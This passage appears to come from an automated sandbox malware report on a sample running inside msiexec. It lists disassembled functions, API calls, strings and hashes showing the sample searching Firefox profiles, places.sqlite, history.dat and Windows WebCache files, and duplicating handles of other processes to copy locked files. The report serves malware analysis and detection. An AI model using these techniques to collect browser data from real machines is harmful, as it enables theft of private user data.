                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                    • API String ID: 1829478387-3369679110
                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 3510742995-2641926074
                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                    Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                    • free.MSVCRT ref: 0041848B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLastfree
                                                                    • String ID: |A
                                                                    • API String ID: 981974120-1717621600
                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 004033B7
                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                    • String ID: $0.@
                                                                    • API String ID: 2758756878-1896041820
                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2941347001-0
                                                                    • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                    • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403C09
                                                                    • memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscat$wcscpywcslen
                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                    • API String ID: 2489821370-1174173950
                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                    Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A824
                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 669240632-0
                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00414458
                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                    • String ID: "%s"
                                                                    • API String ID: 1343145685-3297466227
                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                    • API String ID: 1714573020-3385500049
                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004087D6
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                    • memset.MSVCRT ref: 00408828
                                                                    • memset.MSVCRT ref: 00408840
                                                                    • memset.MSVCRT ref: 00408858
                                                                    • memset.MSVCRT ref: 00408870
                                                                    • memset.MSVCRT ref: 00408888
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2911713577-0
                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 1475443563-3708268960
                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 1579243037-1578091866
                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E60F
                                                                    • memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                    Strings
                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                    • API String ID: 3354267031-2114579845
                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                    • API String ID: 2221118986-1725073988
                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$memcmp
                                                                    • String ID: $$8
                                                                    • API String ID: 2808797137-435121686
                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                    • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                    • String ID:
                                                                    • API String ID: 1979745280-0
                                                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                    Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    • memset.MSVCRT ref: 00414C87
                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcVersionmemsetwcscpy
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 4182280571-2036018995
                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                    • memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                    • String ID: history.dat$places.sqlite
                                                                    • API String ID: 2641622041-467022611
                                                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
